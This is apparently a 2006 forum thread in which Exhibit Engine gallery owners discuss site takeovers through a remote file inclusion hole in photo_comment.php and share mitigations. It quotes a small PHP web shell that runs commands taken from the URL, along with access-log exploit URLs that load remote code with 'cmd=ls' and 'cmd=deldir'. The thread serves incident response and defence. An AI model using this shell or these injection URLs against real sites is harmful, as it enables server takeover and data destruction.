This morning my EE site was defaced. Seems a few files were changed in the public_html\gallery directory. How can I prevent this from happening again???

Please and Thhank you
Jimmie

I noticed people were searching for

Gallery pages created by Exhibit Engine 1.5 RC 4

Presumably there's some hack or insecurity they've found.

I never feel happy with these "powered by" type of text as it's easy to find sites running them if there's any hack doing the rounds.

My site has not been Defaced but I just took a look at my Web Stats and Searches and noticed that I had two hits on

exhibit engine 1.5 rc 4


so there is someone out there trying to cause damage.

I have also been the subject of major spamming of My Feedback section again,

What is the fix for the SPAM?

building_blocks.php in the /indexstyles directory contains the "created by exhibition engine" text that they're searching for.

I've removed it from mine for the time being, although it has been searched for three times already today according to my logs

Edit - Google will have it cached as well :-(

I'm away for a couple of days tomorrow, hoped I don't come back to a defaced / hacked site :-(

I have tried here to attach a file titled shell.php.txt. Remove the .txt to view the php code. I think this is the code that was run on my site???? Any insight. Thanks
Jimmie
Edit
P.S. I guess the attachment didn't work...how can I submitt this code?

building_blocks.php in the /indexstyles directory contains the "created by exhibition engine" text that they're searching for.

I've removed it from mine for the time being, although it has been searched for three times already today according to my logs

Edit - Google will have it cached as well :-(

I'm away for a couple of days tomorrow, hoped I don't come back to a defaced / hacked site :-(

I tried to edit it but it displays a fatal error. What's the proper way to edit this out for awhile?? Thanks
Jimmie

My site got searched on today from IP 213.54.78.132 out of Nordrhein-westfalen, Bochum, Germany.

I tried to edit it but it displays a fatal error. What's the proper way to edit this out for awhile?? Thanks
Jimmie

I didn't remove the code block, just the single line re exhibition engine

I just found dome hacker stuff in a hidden(.dat) folder in my photos directory plus one called irclordz

I turned exhibition engine off when I went to bed last night so I'm not too sure when it happened. I'm on a plane soon so I might just rename the whole ee directory to something else until I come back and can look to getting it sorted

I can't delete or rename their files. Damn! I've got to go now, hope too much damage isn't done by the time I get back

My site has also been hacked. Like a few of the other members I have also had a spate of the feed back being spammed with offers for drugs.

I have checked my web stats and have found the following search terms used,
created by exhibit engine 1.5 rc 4
gallery pages created by exhibit engine
inurl list.php?exhibition= site .uk

Just need to sort the problem out now.

I can find log entries from 213.54.78.132 too :-(
213.54.78.132 - - [04/Jun/2006:16:44:01 +0200] "GET /gallery/photo_comment.php?toroot=http://wplayground.wp.ohost.de/sinc.txt?
&cmd=ls HTTP/1.1" 200 1123 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

I'm currently checking, if there's some damage...

I also checked the IP with whois, it belongs to TISCALI Germany.
We all should write a hacking report to team@abuse.tiscali.de with a full log report of all accesses from that IP. ASAP!! I hope they immediatly cancel the contract of their customer.

Regard from Vienna/Austria
Martin

P.S. Contents of sinc.txt
<?php
echo "<textarea cols=\"100%\" rows=\"100%\">\n";
if($_POST["vcheck"] == "on") echo "vcheck ok";
else passthru($_GET["cmd"]);
echo "</textarea>\n";
?>

To prevent further hacking, delete the file "gallery/photo_comment.php", until there's a fix for that file!

My hacking report is already sent to TISCALI.

Here are some files I found in the Gallery Directory hacked or added:
shell.php
Index.html
Index.php
bondevik.txt
inport.html (with an "n")
inport.html.html
photo_comment.php
header.php

Is this against EE or LunarPages? My ISP is LunarPages and I seen another comment here.

Jimmie

I searched my log for other entries with photo_comment.php and found several entries from different IPs :-(

Found some new files in /tmp on the server...
netstat shows some unknow listening connection...
I'm afraid, there will be a lot of work to do :-(

After reading http://www.photography-on-the.net/forum/showthread.php?t=177618

On further inspection it appears that this impacts many files in eE (I count 17 PHP files affected by this one variable left uninitialied). Simply plugging photo_comment.php just plugs one of the holes.

I think it's best to disable EE completly :-(

I can find log entries from 213.54.78.132 too :-(
213.54.78.132 - - [04/Jun/2006:16:44:01 +0200] "GET /gallery/photo_comment.php?toroot=http://wplayground.wp.ohost.de/sinc.txt?
&cmd=ls HTTP/1.1" 200 1123 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

My very basic understanding of these things suggests that this is an attempt to gain root access by exploiting a flaw in the photo comments php script. Have a look at the file sinc.txt to see what it's trying to do. I think the key is the line

passthru($_GET["cmd"])

Hi

I had p213.54.78.132.tisdip.tiscali.de at 04 Jun 2006 - 15:54

as well

I think the best thing to do for the time being is just to disable EE.

FIX:

To prevent this exploit to work, simply add this to your php.ini:

allow_url_fopen = off

The location of your php.ini will differ from ISP to ISP, on some you may have to include it on a .htaccess file.

To check for the actual configuration, create a page, say info.php, with this code:

<?
phpinfo();
?>

Call it from your web browser (i.e. http://www.yoursite.com/info.php) and check that variable.

be sure to DELETE info.php afterwards, your will be giving too much information to hackers if you leave it.

EE will still work fine with allow_url_fopen = off (I had always had php this way) but all vulnerable php functions (include, include_once, etc) on any EE page will refuse to open external files, which is half the problem here.

I'm sure Pekka started using the include, include_once functions using PHP versions prior to PHP 4.3 (where external files weren't supported) that would explain the lack of escaping and code injection checks in EE.

Having allow_url_fopen enabled without a sound reason is a call for trouble anyway.

Well they suspended me too. Here's their message. Although this looks OK to me. Anyone?

Your account has been exploited:


Mon Jun 5 04:35:00 2006 user jimmiec2 pid 18284 what ./bind
Mon Jun 5 04:45:01 2006 user jimmiec2 pid 18588 what ./bind
Mon Jun 5 04:50:00 2006 user jimmiec2 pid 18284 what ./bind
Mon Jun 5 04:50:00 2006 user jimmiec2 pid 18588 what ./bind

[05/Jun/2006:04:49:27 -0700] "GET
/gallery/list.php?exhibition=5&u=15%7C5%7C... HTTP/1.1" 200 5813
66.249.65.43 - - [05/Jun/2006:04:49:29 -0700] "GET
/gallery/photo.php?photo=595&u=171%7C52%7C... HTTP/1.1" 200 3503 "-"
66.249.65.43 - - [05/Jun/2006:04:49:32 -0700] "GET
/gallery/photo.php?photo=680&u=171%7C47%7C... HTTP/1.1" 200 3486 "-"
66.249.65.43 - - [05/Jun/2006:04:49:33 -0700] "GET
/gallery/photo.php?photo=784&u=2198%7C29%7C... HTTP/1.1" 200 3528 "-"
66.249.65.43 - - [05/Jun/2006:04:49:34 -0700] "GET
/gallery/photo.php?photo=503&exhibition=22&u=1421%7C14%7C... HTTP/1.1" 200
3504
66.249.65.43 - - [05/Jun/2006:04:49:35 -0700]


Jimmie

My Web host sent me this information today.
----
Quite a spectacular security hole. The file photo_comment.php, and quite a few other files, contain something like this:

"
$getlang = $toroot . "languages/" . $lang . "/comment.php";
include_once($getlang);
"

By using a URL like this:

http://www.mydomain.com/photo_comment.php?toroot=http://www.geocities.com/chireobox/gnomex.html?

The script would include the file at:

http://www.geocities.com/chireobox/gnomex.html?languages/english/comment.php

Then run it. This allows a hacker to run whatever code they like on the
web server.
----

Peter

I think it's best to disable EE completly :-(

Well, I patched the obvious hole (the one where hackers are using using the "toroot=blah" exploit) in mine and my eE has not been exploited.

However, I'm VERY curious as to what other global variables are not properly initialized in eE. The easiest way to prevent this is to set global variables to some initial value in the script so that hackers can't use GET or POST injection. What I would do, if I were Pekka, is include some "sanitizer.php" file in every browser accessible script. This sanitizer.php file would initialize the globals and sanitize any user submitted data.

The second thing I would do if I were Pekka is to move php scripts, that the browser never accesses, to a sub-directory and then just deny all browser access to that directory (using an .htaccess "deny from all" directive). That's just the start of making eE more secure.

This whole eE exploit thing just doesn't sound good. Let's hope Pekka can become more security conscious about these things. Being a PHP veteran and a corporate web developer, I know the pitfalls. I'm willing to help Pekka if he needs the help.

My service provider has just sent me an email reporting that both photo_comment.php and /indexstyles/groupindex.php have been abused and the result has been a phishing site installed on my server

.recover/signin.ebay.com/ws/eBayISAPI.dl/login/client4844AD7451/eBayISAPI.htm

I'm not sure what to do about this, but want to mak all aware.

I just came back from Norway, so I'm late with comments.

If $toroot or $lang or any variable can be changed from URL, it means in php.ini register_globals = on
I have said it many times, set it off: http://photography-on-the.net/forum/showthread.php?t=59135&highlight=register_globals
In this sense I do not feel that the problem is EE problem, it is PHP configuration problem and affects all installed PHP applications on your server. But of course all should be done to avoid exploits even on systems with globals off.

More soon.

Well, I patched the obvious hole (the one where hackers are using using the "toroot=blah" exploit) in mine and my eE has not been exploited.


Sorry if I'm being stupid here, how exactly did you carry out the patch?

I just came back from Norway, so I'm late with comments.

If $toroot or $lang or any variable can be changed from URL, it means in php.ini register_globals = on
I have said it many times, set it off: http://photography-on-the.net/forum/showthread.php?t=59135&highlight=register_globals


Can this be done without having access to php.ini?

Can this be done without having access to php.ini?

.htaccess with

php_flag register_globals off

should do it.

or

php_flag register_globals 0

On Apache 2 this will not work. It has to be put by your host in the VirtualHost handler for your website in httpd.conf.

Thanks. Works.

[QUOTE=PeterTaylor]My Web host sent me this information today.
----
Quite a spectacular security hole. The file photo_comment.php, and quite a few other files, contain something like this:

I deleted the photo_comment.php early in the game. Where does it live so I can put a good copy back?

Thanks
Jimmie

I think I had the same problem since 6/6/6 (hell yeah). I just found out the entire web site has been hacked too.

So where do I put the .htaccess file exactly ? What content in it ?

Thanks !

GuiBou (not so used to messing with that :) )

I think I had the same problem since 6/6/6 (hell yeah). I just found out the entire web site has been hacked too.

So where do I put the .htaccess file exactly ? What content in it ?

Thanks !

GuiBou (not so used to messing with that :) )

Just one line:

php_flag register_globals 0

and put it in your gallery folder (where index.php is). Then do the test procedure again as instructed in http://photography-on-the.net/forum/showthread.php?t=177875

I just got hacked on June 12 thru the photo_comment.php file. My hosting company had shut me down for a day and now still monitoring the situation.

Has anyone heard of this?
I just downloaded my log files and found the details to the attack.

This is an example:
internal--router.canaca.com - - [14/Jun/2006:08:00:39 -0400] "GET /photodbase/photo_comment.php?toroot=http%3A%2F%2Fubayin.com%2 F_vti_txt%2Fi.x%3F&cmd=deldir&&s=r&

HTTP/1.1" 200 5101 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

Any ways of stopping?

Fix is in http://photography-on-the.net/forum/showthread.php?t=177875. You will need to clean all unknown files and temp dirs.

Thank you Pekka for the info I did the test.php file and it is ok.
There are many files in my temp directory and going thru my admin panel for my site I cannot delete the files, so I will pass this info on to my hosting company and maybe they can clean it up.

Should there be anything in this temp directory?
Is there a way that you can get me a list of what to keep and I can pass this along to my hosting company?

Thanks again Pekka and I hope you are enjoying the summer.

PP

I was also hacked recently and they left a message in the code for me. Something like:

"You have been hacked by ____. Sorry admin - don't worry, none of your data was affected. Email ___."

Anyway, sounds like it's similar to what all of you have had experience with. So you know, the hacker did not damage anything other than making a new frontpage. I have also emailed them with a junk account just to chat. I'll let you all know what this is all about when I find out more.

They installed a proxy server in my comments folder. I've been monitoring my log files everyday now and there has been no activity - I think they gave up.

But I would REALLY like to find out about some info - see my post above.

Any news on V 2.0?

"You have been hacked by ____. Sorry admin - don't worry, none of your data was affected. Email ___."

Anyway, sounds like it's similar to what all of you have had experience with. So you know, the hacker did not damage anything other than making a new frontpage.

Of course, he might be just saying that so you don't go looking for all of the other files that he uploaded to your site.

Do you trust hackers?

So I actually emailed my hacker and have had some discussion with him/her about what she/he did. Basically, sounds like they found out about this vulnerability and wanted to get some practice/bragging rights with peers. That's not what they actually said, of course. Anyway, I think most hackers are ultimately harmless tinkerers, but I will be glad to be rid of them.

Well it was my turn today! I didn't know there was an exploit in EE until today! My host suspended my page (but of course they sent an email to the suspended account which I couldn't read!!!)

I changed the password on my account (using WHM on my reseller account), and it turns out that somehow or other, 5 extra accounts attached to my account have appeared in the vhosts file. When I changed the password for my domain, I got the following message:-

Ftp Updating...

Main >> Account Functions >> Password Modification

Updating ftp passwords for all users
Warning: Unable to determine satprep's main domain. Skipping vhosts
password update for this user.
Warning: Unable to determine mdc1956's main domain. Skipping vhosts
password update for this user.
Warning: Unable to determine secret's main domain. Skipping vhosts
password update for this user.
Warning: Unable to determine xplicit1's main domain. Skipping vhosts
password update for this user.
Warning: Unable to determine poonan's main domain. Skipping vhosts
password update for this user.
Ftp password files updated.
Ftp vhost passwords synced


So I don't know if these accounts still exist or not!!! If I delete EE or install the 1.5_SECURE package, will they still be able to gain access using those usernames?